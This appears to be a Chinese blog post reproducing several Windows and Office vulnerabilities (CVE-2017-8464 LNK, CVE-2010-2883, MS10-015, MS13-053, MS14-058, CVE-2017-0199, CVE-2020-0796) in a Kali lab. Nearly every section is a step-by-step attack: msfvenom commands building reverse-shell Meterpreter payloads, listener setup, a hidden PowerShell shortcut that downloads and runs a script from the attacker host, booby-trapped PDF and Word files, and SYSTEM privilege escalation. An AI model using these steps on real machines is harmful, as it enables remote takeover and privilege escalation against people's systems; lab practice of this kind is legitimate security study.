漏洞复现的整理

CVE-2017-8464

漏洞类型

Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

利用原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

实操

  1. 搭建Kali攻击机,ip地址为192.168.88.136。当Windows系统在解析powershell快捷方式时,存在远程执行任意代码的漏洞(CVE-2017-8464)。

  2. 生成攻击文件<search.ps1> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.136 lport=5555 -f psh-reflection > /var/www/html/search.ps1

    把生成的search.ps1 copy到/var/www/html cp /root/search.ps1 /var/www/html

    image-20200911185133159

  3. 开启Apache服务 service apache2 start

  4. 开启监听

    use exploit/multi/handler

    set payload windows/x64/meterpreter/reverse_tcp (和攻击文件使用的payload一样)

    set lhost 192.168.88.136

    set lport 5555

    run

    image-20200911185247700

  5. 在win10靶机创建快捷方式 powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.88.136/search.ps1‘);test.ps1"。

    image-20200911185231556

  6. 双击快捷键,成功返回到metasploit上一个session 输入shell,就可以控制靶机了

    image-20200911185256601

CVE-2010-2883

漏洞类型

CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。

利用原理

Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。

实操

  1. 搭建Win7目标靶机,内含Adobe Reader9.3,存在存在栈溢出漏洞(CVE-2010-2883)。 攻击机kali,ip:192.168.43.153。

  2. 启动MSF,在终端输入msfconsole

    调用渗透模块

    use exploit/windows/fileformat/adobe_cooltype_sing/

    查看模块详情 Info

    image-20200911181505762

  3. 调用meterpreter载荷,反向连接到渗透机,设置带有后门程序的PDF文件,执行渗透生成文件

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.43.153

    set LPORT 8888

    set FILENAME PINGINGLAB.pdf

    exploit

    image-20200911183200401

  4. 开启shell监听会话,使用handler监听模块

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.43.153

    set LPORT 8888

    exploit

    image-20200911183232373

  5. 将生成的pdf文件复制到靶机上打开。

    image-20200911182515072

  6. 返回kali的监听窗口,接收返回的session。

    image-20200911182530117

CVE-2010-0233(MS10-015)

漏洞类型

Microsoft Windows内核双重释放本地权限提升漏洞

实操

  1. 搭建Win7x86目标靶机,存在 CVE-2010-0233(MS10-015)漏洞,kali攻击机ip地址为192.168.3.27。
  2. 这里直接生成一个木马放到win7中运行。msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.3.27 LPORT=4444 -b"\x00" -f exe > aiu.exe
  3. 开启监听 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.3.27 set lport 4444 //默认端口4444,这一步可以省去 run
  4. 将生成的you.exe文件复制到靶机,打开运行
  5. 再次查看监听窗口。提示有session连接。 background
  6. 使用 ms10_015_kitrap0d模块提权 Search ms10_015 use exploit/windows/local/ms10_015_kitrap0d set session 3 run 会创建一个新的session,权限是system

测试结果

  1. 步骤3执行后,可以看到如图提示:

image-20211005010513358

  1. 执行操作步骤4后,开启监听,可以看到:

    image-20211005010533549

  2. 将aiu.exe文件复制到靶机打开。再返回监听窗口。

    image-20211005010558563

image-20211005010605070

4.用msf的 ms10_015_kitrap0d 模块提权

image-20211005010623713

image-20211005010630885

image-20211005010637688

CVE-2013-1300(MS13-053)

漏洞类型

Microsoft Windows Kernel 'Win32k.sys'本地权限提升漏洞(CVE-2013-1300)(MS13-053)

实操

  1. 搭建Win7x86目标靶机,存在 CVE-2013-1300(MS13-053)漏洞,kali攻击机ip地址为192.168.3.50。

  2. 这里直接生成一个木马放到win7中运行。msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.3.50 LPORT=4444 -b"\x00" -f exe > a.exe

  3. 开启监听

    msfconsole

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.3.50

    set lport 4444 //默认端口4444,这一步可以省去

    run

  4. 将生成的a.exe文件复制到靶机,打开运行。

  5. .再次查看监听窗口。提示有session连接。

    Getuid

    background

  6. 使用ms13_053_schlamperei模块提权

    Search ms13_053

    use exploit/windows/local/ ms13_053_schlamperei

    set session 1

    run

会创建一个新的session,权限是system

测试结果

  1. 步骤3执行后,可以看到如图提示: img
  2. 执行操作步骤4后,开启监听,可以看到: img
  3. 将a.exe文件复制到靶机打开。再返回监听窗口。

image-20211005011239514

image-20211005011248092

用msf的 ms13_053_schlamperei 模块提权 img img

clip_image006

CVE-2014-4113(MS14-058)

漏洞类型

MS14-058 Windows内核提权漏洞

该漏洞影响了所有的Windows版本,包括Windows7 和 Windows Server 2008 R2 及以下版本。造成该漏洞原因是当 Windows 内核模式驱动程序 (win32k.sys) 不正确地处理内存中的对象时,会导致该漏洞。

实操

  1. 搭建Win7x86目标靶机,存在CVE-2014-4113(MS14-058)漏洞,kali攻击机ip地址为192.168.43.153。

  2. 这里直接生成一个木马放到win7中运行。msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.43.153 LPORT=4444 -b"\x00" -f exe > aiu.exe

  3. 开启监听

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set lhost 192.168.43.153

    set lport 4444 //默认端口4444,这一步可以省去 run

  4. 将生成的aiu.exe文件复制到靶机,打开运行

  5. 再次查看监听窗口。提示有session连接。

  6. 使用ms14_058_track_popup_menu模块提权

    use exploit/windows/local/ms14_058_track_popup_menu set session 1

    run

会创建一个新的session,权限是system

1.步骤3执行后,可以看到如图提示:

img

2.执行操作步骤4后,开启监听,可以看到: img

3.将aiu.exe文件复制到靶机打开。再返回监听窗口。

clip_image006

img img

4.用msf的ms14_058_track_popup_menu模块提权

image-20211005011714740

CVE-2017-0199

漏洞类型

Microsoft Office 逻辑漏洞

此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。

受影响的版本
Microsoft Office 2016
Microsoft Office 2013
Microsoft Office 2010
Microsoft Office 2007

实操

  1. 搭建Win10目标靶机,内含 Microsoft Office2010,存在Office逻辑漏洞(CVE-2017-0199)。 攻击机kali,ip:192.168.3.27。

  2. 打开攻击机kali,打开终端。

  3. 开启MSF,输入:msfconsole。开启 HTA 服务。输入: use exploit/windows/misc/hta_server run

  4. 生成EXPLOIT文档,此处的 TARGETURI应与步骤3中生成的地址一样。

    use exploit/windows/fileformat/office_word_hta

    set TARGETURI http://192.168.3.27:8080/aEOF4h.hta set FILENAME msf.doc

    run

  5. 将生成的msf.doc文件复制到windows上

  6. 打开win10,关闭实时保护,打开文件。

  7. 返回kali,已经生成一个连接session了。可以通过sessions -i 查看当前的session。进入session,sessions -i 1

测试结果

  1. 步骤3,开启HTA。

    img

    若不成功,输入命令reload重载模块,再次执行步骤3

  2. 执行操作步骤4后,可以看到如图提示,生成EXPLOIT文档。 img

    最下为文件存储位置。

  3. 到win10靶机上,关闭防护,打开文件。 img

    clip_image008

    img

  4. 返回Kali。 img img

CVE-2020-0796

漏洞类型

SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”

实操

  1. 搭建Win10 1903版目标靶机,内含SMB服务,存在“永恒之黑”漏洞(CVE-2020-0796),kali攻击机ip地址为192.168.43.153。

  2. 关闭靶机的防火墙和杀毒软件。

  3. 这里直接生成一个木马放到win10中运行。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.153 LPORT=4444 -f exe > shell.exe

  4. 开启监听

    use exploit/multi/handler

    set payload windows/x64/meterpreter/reverse_tcp

    show options

    set lhost 192.168.43.153

    set lport 4444 //默认端口4444,这一步可以省去

    run -j //以后台的方式运行

  5. 将生成的shell.exe文件复制到靶机,打开运行

  6. 再次查看监听窗口。提示有session连接。

  7. 使用cve_2020_0796_smbghost模块提权

    use exploit/windows/local/cve_2020_0796_smbghost set session 6

    run

会创建一个新的session,权限是system

测试结果

  1. 步骤3执行后,可以看到如图提示: img
  2. 执行操作步骤4后,开启监听,可以看到: img
  3. 将shell.exe文件复制到靶机打开。再返回监听窗口。 img img
  4. getsystem提权失败,用msf的cve-2020-0796_smbghost模块提权 img img img img
posted @ 2020-09-11 18:27  Nicky_啦啦啦是阿落啊  阅读(148)  评论(0编辑  收藏  举报